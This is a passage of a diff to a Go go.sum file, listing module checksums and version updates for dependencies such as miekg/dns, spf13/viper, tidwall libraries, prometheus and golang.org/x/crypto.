github.com/mholt/acmez v1.0.3 h1:mDgRxGYk6TKlfydYNMfX0HXXJh9i73YL+swPjYCADU8=
|
||||
github.com/mholt/acmez v1.0.3/go.mod h1:qFGLZ4u+ehWINeJZjzPlsnjJBCPAADWTcIqE/7DAYQY=
|
||||
github.com/miekg/dns v1.1.15/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg=
|
||||
github.com/miekg/dns v1.1.22 h1:Jm64b3bO9kP43ddLjL2EY3Io6bmy1qGb9Xxz6TqS6rc=
|
||||
github.com/miekg/dns v1.1.22/go.mod h1:bPDLeHnStXmXAq1m/Ch/hvfNHr14JKNPMBo3VZKjuso=
|
||||
github.com/miekg/dns v1.1.50 h1:DQUfb9uc6smULcREF09Uc+/Gd46YWqJd5DbpPE9xkcA=
|
||||
github.com/miekg/dns v1.1.50/go.mod h1:e3IlAVfNqAllflbibAZEWOXOQ+Ynzk/dDozDxY7XnME=
|
||||
github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0=
|
||||
github.com/mitchellh/go-vnc v0.0.0-20150629162542-723ed9867aed/go.mod h1:3rdaFaCv4AyBgu5ALFM0+tSuHrBh6v692nyQe3ikrq0=
|
||||
github.com/mitchellh/mapstructure v1.1.2 h1:fmNYVwqnSfB9mZU6OS2O6GsXM+wcskZDuKQzvN1EDeE=
|
||||
github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y=
|
||||
github.com/mitchellh/mapstructure v1.4.3 h1:OVowDSCllw/YjdLkam3/sm7wEtOy59d8ndGgCcyj8cs=
|
||||
github.com/mitchellh/mapstructure v1.4.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo=
|
||||
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
|
||||
@@ -185,7 +271,6 @@ github.com/nbio/st v0.0.0-20140626010706-e9e8d9816f32/go.mod h1:9wM+0iRr9ahx58uY
|
||||
github.com/nrdcg/auroradns v1.0.0/go.mod h1:6JPXKzIRzZzMqtTDgueIhTi6rFf1QvYE/HzqidhOhjw=
|
||||
github.com/nrdcg/goinwx v0.6.1/go.mod h1:XPiut7enlbEdntAqalBIqcYcTEVhpv/dKWgDCX2SwKQ=
|
||||
github.com/nrdcg/namesilo v0.2.1/go.mod h1:lwMvfQTyYq+BbjJd30ylEG4GPSS6PII0Tia4rRpRiyw=
|
||||
github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U=
|
||||
github.com/olekukonko/tablewriter v0.0.1/go.mod h1:vsDQFd/mU46D+Z4whnwzcISnGGzXWMclvtLoiIKAKIo=
|
||||
github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
|
||||
github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
|
||||
@@ -193,36 +278,36 @@ github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1Cpa
|
||||
github.com/openzipkin/zipkin-go v0.1.6/go.mod h1:QgAqvLzwWbR/WpD4A3cGpPtJrZXNIiJc5AZX7/PBEpw=
|
||||
github.com/oracle/oci-go-sdk v7.0.0+incompatible/go.mod h1:VQb79nF8Z2cwLkLS35ukwStZIg5F66tcBccjip/j888=
|
||||
github.com/ovh/go-ovh v0.0.0-20181109152953-ba5adb4cf014/go.mod h1:joRatxRJaZBsY3JAOEMcoOp05CnZzsx4scTxi95DHyQ=
|
||||
github.com/pelletier/go-toml v1.2.0 h1:T5zMGML61Wp+FlcbWjRDT7yAxhJNAiPPLOFECq181zc=
|
||||
github.com/pelletier/go-toml v1.2.0/go.mod h1:5z9KED0ma1S8pY6P1sdut58dfprrGBbd/94hg7ilaic=
|
||||
github.com/pelletier/go-toml v1.9.4 h1:tjENF6MfZAg8e4ZmZTeWaWiT2vXtsoO6+iuOjFhECwM=
|
||||
github.com/pelletier/go-toml v1.9.4/go.mod h1:u1nR/EPcESfeI/szUZKdtJ0xRNbUoANCkoOuaOx1Y+c=
|
||||
github.com/pierrec/lz4 v2.0.5+incompatible/go.mod h1:pdkljMzZIN41W+lC3N2tnIh5sFi+IEE17M5jbnwPHcY=
|
||||
github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
|
||||
github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/sftp v1.13.1/go.mod h1:3HaPG6Dq1ILlpPZRO0HVMrsydcdLt6HRDccSgb87qRg=
|
||||
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
|
||||
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
|
||||
github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw=
|
||||
github.com/prometheus/client_golang v0.9.3-0.20190127221311-3c4408c8b829/go.mod h1:p2iRAGwDERtqlqzRXnrOVns+ignqQo//hLXqYxZYVNs=
|
||||
github.com/prometheus/client_golang v0.9.3/go.mod h1:/TN21ttK/J9q6uSwhBd54HahCDft0ttaMvbicHlPoso=
|
||||
github.com/prometheus/client_golang v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo=
|
||||
github.com/prometheus/client_golang v1.1.0/go.mod h1:I1FGZT9+L76gKKOs5djB6ezCbFQP1xR9D75/vuwEF3g=
|
||||
github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo=
|
||||
github.com/prometheus/client_model v0.0.0-20190115171406-56726106282f/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo=
|
||||
github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
|
||||
github.com/prometheus/common v0.0.0-20181113130724-41aa239b4cce/go.mod h1:daVV7qP5qjZbuso7PdcryaAu0sAZbrN9i7WWcTMWvro=
|
||||
github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
|
||||
github.com/prometheus/common v0.2.0/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.4.0/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.6.0/go.mod h1:eBmuwkDJBwy6iBfxCBob6t6dR6ENT/y+J+Zk0j9GMYc=
|
||||
github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk=
|
||||
github.com/prometheus/procfs v0.0.0-20190117184657-bf6a532e95b1/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk=
|
||||
github.com/prometheus/procfs v0.0.0-20190507164030-5867b95ac084/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA=
|
||||
github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA=
|
||||
github.com/prometheus/procfs v0.0.3/go.mod h1:4A/X28fw3Fc593LaREMrKMqOKvUAntwMDaekg4FpcdQ=
|
||||
github.com/prometheus/tsdb v0.7.1/go.mod h1:qhTCs0VvXwvX/y3TZrWD7rabWM+ijKTux40TwIPHuXU=
|
||||
github.com/rainycape/memcache v0.0.0-20150622160815-1031fa0ce2f2/go.mod h1:7tZKcyumwBO6qip7RNQ5r77yrssm9bfCowcLEBcU5IA=
|
||||
github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
|
||||
github.com/rogpeppe/fastuuid v0.0.0-20150106093220-6724a57986af/go.mod h1:XWv6SoW27p1b0cqNHllgS5HIMJraePCO15w5zCzIWYg=
|
||||
github.com/rogpeppe/go-charset v0.0.0-20180617210344-2471d30d28b4/go.mod h1:qgYeAmZ5ZIpBWTGllZSQnw97Dj+woV0toclVaRGI8pc=
|
||||
github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4=
|
||||
github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
|
||||
github.com/sacloud/libsacloud v1.26.1/go.mod h1:79ZwATmHLIFZIMd7sxA3LwzVy/B77uj3LDoToVTxDoQ=
|
||||
github.com/satori/go.uuid v1.2.0/go.mod h1:dA0hQrYB0VpLJoorglMZABFdXlWrHn1NEOzdhQKdks0=
|
||||
@@ -232,77 +317,125 @@ github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6Mwd
|
||||
github.com/skratchdot/open-golang v0.0.0-20160302144031-75fb7ed4208c/go.mod h1:sUM3LWHvSMaG192sy56D9F7CNvL7jUJVXoqM1QKLnog=
|
||||
github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc=
|
||||
github.com/smartystreets/goconvey v0.0.0-20190330032615-68dc04aab96a/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA=
|
||||
github.com/soheilhy/cmux v0.1.4/go.mod h1:IM3LyeVVIOuxMH7sFAkER9+bJ4dT7Ms6E4xg4kGIyLM=
|
||||
github.com/spaolacci/murmur3 v0.0.0-20180118202830-f09979ecbc72/go.mod h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA=
|
||||
github.com/spf13/afero v1.1.2 h1:m8/z1t7/fwjysjQRYbP0RD+bUIF/8tJwPdEZsI83ACI=
|
||||
github.com/spf13/afero v1.1.2/go.mod h1:j4pytiNVoe2o6bmDsKpLACNPDBIoEAkihy7loJ1B0CQ=
|
||||
github.com/spf13/cast v1.3.0 h1:oget//CVOEoFewqQxwr0Ej5yjygnqGkvggSE/gB35Q8=
|
||||
github.com/spf13/cast v1.3.0/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE=
|
||||
github.com/spf13/jwalterweatherman v1.0.0 h1:XHEdyB+EcvlqZamSM4ZOMGlc93t6AcsBEu9Gc1vn7yk=
|
||||
github.com/spf13/jwalterweatherman v1.0.0/go.mod h1:cQK4TGJAtQXfYWX+Ddv3mKDzgVb68N+wFjFa4jdeBTo=
|
||||
github.com/spf13/pflag v1.0.3 h1:zPAT6CGy6wXeQ7NtTnaTerfKOsV6V6F8agHXFiazDkg=
|
||||
github.com/spf13/pflag v1.0.3/go.mod h1:DYY7MBk1bdzusC3SYhjObp+wFpr4gzcvqqNjLnInEg4=
|
||||
github.com/spf13/viper v1.4.0 h1:yXHLWeravcrgGyFSyCgdYpXQ9dR9c/WED3pg1RhxqEU=
|
||||
github.com/spf13/viper v1.4.0/go.mod h1:PTJ7Z/lr49W6bUbkmS1V3by4uWynFiR9p7+dSq/yZzE=
|
||||
github.com/spf13/afero v1.8.1 h1:izYHOT71f9iZ7iq37Uqjael60/vYC6vMtzedudZ0zEk=
|
||||
github.com/spf13/afero v1.8.1/go.mod h1:CtAatgMJh6bJEIs48Ay/FOnkljP3WeGUG0MC1RfAqwo=
|
||||
github.com/spf13/cast v1.4.1 h1:s0hze+J0196ZfEMTs80N7UlFt0BDuQ7Q+JDnHiMWKdA=
|
||||
github.com/spf13/cast v1.4.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE=
|
||||
github.com/spf13/jwalterweatherman v1.1.0 h1:ue6voC5bR5F8YxI5S67j9i582FU4Qvo2bmqnqMYADFk=
|
||||
github.com/spf13/jwalterweatherman v1.1.0/go.mod h1:aNWZUN0dPAAO/Ljvb5BEdw96iTZ0EXowPYD95IqWIGo=
|
||||
github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
|
||||
github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
|
||||
github.com/spf13/viper v1.10.1 h1:nuJZuYpG7gTj/XqiUwg8bA0cp1+M2mC3J4g5luUYBKk=
|
||||
github.com/spf13/viper v1.10.1/go.mod h1:IGlFPqhNAPKRxohIzWpI5QEy4kuI7tcl5WvR+8qy1rU=
|
||||
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
|
||||
github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
|
||||
github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
|
||||
github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
|
||||
github.com/stretchr/testify v1.4.0 h1:2E4SXV/wtOkTonXsotYi4li6zVWxYlZuYNCXe9XRJyk=
|
||||
github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
|
||||
github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA=
|
||||
github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
|
||||
github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
|
||||
github.com/subosito/gotenv v1.2.0 h1:Slr1R9HxAlEKefgq5jn9U+DnETlIUa6HfgEzj0g5d7s=
|
||||
github.com/subosito/gotenv v1.2.0/go.mod h1:N0PQaV/YGNqwC0u51sEeR/aUtSLEXKX9iv69rRypqCw=
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 h1:QnyrPZZvPmR0AtJCxxfCtI1qN+fYpKTKJ/5opWmZ34k=
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0/go.mod h1:huei1BkDWJ3/sLXmO+bsCNELL+Bp2Kks9OLyQFkzvA8=
|
||||
github.com/tidwall/buntdb v1.1.0 h1:H6LzK59KiNjf1nHVPFrYj4Qnl8d8YLBsYamdL8N+Bao=
|
||||
github.com/tidwall/buntdb v1.1.0/go.mod h1:Y39xhcDW10WlyYXeLgGftXVbjtM0QP+/kpz8xl9cbzE=
|
||||
github.com/tidwall/gjson v1.3.2 h1:+7p3qQFaH3fOMXAJSrdZwGKcOO/lYdGS0HqGhPqDdTI=
|
||||
github.com/tidwall/gjson v1.3.2/go.mod h1:P256ACg0Mn+j1RXIDXoss50DeIABTYK1PULOJHhxOls=
|
||||
github.com/tidwall/gjson v1.14.0 h1:6aeJ0bzojgWLa82gDQHcx3S0Lr/O51I9bJ5nv6JFx5w=
|
||||
github.com/tidwall/gjson v1.14.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk=
|
||||
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb h1:5NSYaAdrnblKByzd7XByQEJVT8+9v0W/tIY0Oo4OwrE=
|
||||
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb/go.mod h1:lKYYLFIr9OIgdgrtgkZ9zgRxRdvPYsExnYBsEAd8W5M=
|
||||
github.com/tidwall/match v1.0.1 h1:PnKP62LPNxHKTwvHHZZzdOAOCtsJTjo6dZLCwpKm5xc=
|
||||
github.com/tidwall/match v1.0.1/go.mod h1:LujAq0jyVjBy028G1WhWfIzbpQfMO8bBZ6Tyb0+pL9E=
|
||||
github.com/tidwall/pretty v1.0.0 h1:HsD+QiTn7sK6flMKIvNmpqz1qrpP3Ps6jOKIKMooyg4=
|
||||
github.com/tidwall/pretty v1.0.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk=
|
||||
github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA=
|
||||
github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM=
|
||||
github.com/tidwall/pretty v1.2.0 h1:RWIZEg2iJ8/g6fDDYzMpobmaoGh5OLl4AXtGUGPcqCs=
|
||||
github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU=
|
||||
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e h1:+NL1GDIUOKxVfbp2KoJQD9cTQ6dyP2co9q4yzmT9FZo=
|
||||
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e/go.mod h1:/h+UnNGt0IhNNJLkGikcdcJqm66zGD/uJGMRxK/9+Ao=
|
||||
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563 h1:Otn9S136ELckZ3KKDyCkxapfufrqDqwmGjcHfAyXRrE=
|
||||
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563/go.mod h1:mLqSmt7Dv/CNneF2wfcChfN1rvapyQr01LGKnKex0DQ=
|
||||
github.com/timewasted/linode v0.0.0-20160829202747-37e84520dcf7/go.mod h1:imsgLplxEC/etjIhdr3dNzV3JeT27LbVu5pYWm0JCBY=
|
||||
github.com/tmc/grpc-websocket-proxy v0.0.0-20190109142713-0ad062ec5ee5/go.mod h1:ncp9v5uamzpCO7NfCPTXjqaC+bZgJeR0sMTm6dMHP7U=
|
||||
github.com/transip/gotransip v0.0.0-20190812104329-6d8d9179b66f/go.mod h1:i0f4R4o2HM0m3DZYQWsj6/MEowD57VzoH0v3d7igeFY=
|
||||
github.com/uber-go/atomic v1.3.2/go.mod h1:/Ct5t2lcmbJ4OSe/waGBoaVvVqtO0bmtfVNex1PFV8g=
|
||||
github.com/ugorji/go v1.1.4/go.mod h1:uQMGLiO92mf5W77hV/PUCpI3pbzQx3CRekS0kk+RGrc=
|
||||
github.com/urfave/cli v1.22.1/go.mod h1:Gos4lmkARVdJ6EkW0WaNv/tZAAMe9V7XWyB60NtXRu0=
|
||||
github.com/vultr/govultr v0.1.4/go.mod h1:9H008Uxr/C4vFNGLqKx232C206GL0PBHzOP0809bGNA=
|
||||
github.com/xeipuuv/gojsonpointer v0.0.0-20180127040702-4e3ac2762d5f/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU=
|
||||
github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ=
|
||||
github.com/xeipuuv/gojsonschema v1.1.0/go.mod h1:5yf86TLmAcydyeJq5YvxkGPE2fm/u4myDekKRoLuqhs=
|
||||
github.com/xiang90/probing v0.0.0-20190116061207-43a291ad63a2/go.mod h1:UETIi67q53MR2AWcXfiuqkDkRtnGDLqkBTpCHuJHxtU=
|
||||
github.com/xordataexchange/crypt v0.0.3-0.20170626215501-b2862e3d0a77/go.mod h1:aYKd//L2LvnjZzWKhF00oedf4jCCReLcmhLdhm1A27Q=
|
||||
go.etcd.io/bbolt v1.3.2/go.mod h1:IbVyRI1SCnLcuJnV2u8VeU0CEYM7e686BmAb1XKL+uU=
|
||||
github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k=
|
||||
go.opencensus.io v0.20.1/go.mod h1:6WKK9ahsWS3RSO+PY9ZHZUfv2irvY6gN279GOPZjmmk=
|
||||
go.opencensus.io v0.20.2/go.mod h1:6WKK9ahsWS3RSO+PY9ZHZUfv2irvY6gN279GOPZjmmk=
|
||||
go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
|
||||
go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8=
|
||||
go.opencensus.io v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.4/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.5/go.mod h1:5pWMHQbX5EPX2/62yrJeAkowc+lfs/XD7Uxpq3pI6kk=
|
||||
go.uber.org/atomic v1.3.2/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
|
||||
go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
|
||||
go.uber.org/multierr v1.1.0/go.mod h1:wR5kodmAFQ0UK8QlbwjlSNy0Z68gJhDJUG5sjR94q/0=
|
||||
go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc=
|
||||
go.uber.org/atomic v1.9.0 h1:ECmE8Bn/WFTYwEW/bpKD3M8VtR/zQVbavAoalC1PYyE=
|
||||
go.uber.org/atomic v1.9.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc=
|
||||
go.uber.org/goleak v1.1.11 h1:wy28qYRKZgnJTxGxvye5/wgWr1EKjmUDGYox5mGlRlI=
|
||||
go.uber.org/goleak v1.1.11/go.mod h1:cwTWslyiVhfpKIDGSZEM2HlOvcqm+tG4zioyIeLoqMQ=
|
||||
go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU=
|
||||
go.uber.org/multierr v1.8.0 h1:dg6GjLku4EH+249NNmoIciG9N/jURbDG+pFlTkhzIC8=
|
||||
go.uber.org/multierr v1.8.0/go.mod h1:7EAYxJLBy9rStEaz58O2t4Uvip6FSURkq8/ppBp95ak=
|
||||
go.uber.org/ratelimit v0.0.0-20180316092928-c15da0234277/go.mod h1:2X8KaoNd1J0lZV+PxJk/5+DGbO/tpwLR1m++a7FnB/Y=
|
||||
go.uber.org/zap v1.10.0/go.mod h1:vwi/ZaCAaUcBkycHslxD9B2zi4UTXhF60s6SWpuDF0Q=
|
||||
go.uber.org/zap v1.21.0 h1:WefMeulhovoZ2sYXz7st6K0sLj7bBhpiFaud4r4zST8=
|
||||
go.uber.org/zap v1.21.0/go.mod h1:wjWOCqI0f2ZZrJF/UufIOkiC8ii6tm1iqIsLo76RfJw=
|
||||
golang.org/x/crypto v0.0.0-20180621125126-a49355c7e3f8/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20190211182817-74369b46fc67/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
|
||||
golang.org/x/crypto v0.0.0-20190418165655-df01cb2cc480/go.mod h1:WFFai1msRO1wXaEeE5yQxYXgSfI8pQAWXbQop6sCtWE=
|
||||
golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190701094942-4def268fd1a4/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392 h1:ACG4HJsFiNMf47Y4PeRoebLNy/2lXT9EtprMuTFWt1M=
|
||||
golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392/go.mod h1:/lpIB1dKB+9EgE3H3cr1v9wB50oz8l4C4h62xy7jSTY=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9 h1:psW17arqaxU48Z5kZ0CQnkZWQJsqcURM6tKiBApRjXI=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
|
||||
golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
|
||||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa h1:zuSxTR4o9y82ebqCUJYNGJbGPo6sKVl54f/TVDObg1c=
|
||||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
|
||||
golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8=
|
||||
golang.org/x/exp v0.0.0-20190829153037-c13cbed26979/go.mod h1:86+5VVa7VpoJ4kLfm080zCjGlMRFzhUhsZKEZO7MGek=
|
||||
golang.org/x/exp v0.0.0-20191030013958-a1ab85dbe136/go.mod h1:JXzH8nQsPlswgeRAPE3MuO9GYsAcnJvJ4vnMwN/5qkY=
|
||||
golang.org/x/exp v0.0.0-20191129062945-2f5052295587/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
golang.org/x/exp v0.0.0-20191227195350-da58074b4299/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
golang.org/x/exp v0.0.0-20200119233911-0405dc783f0a/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
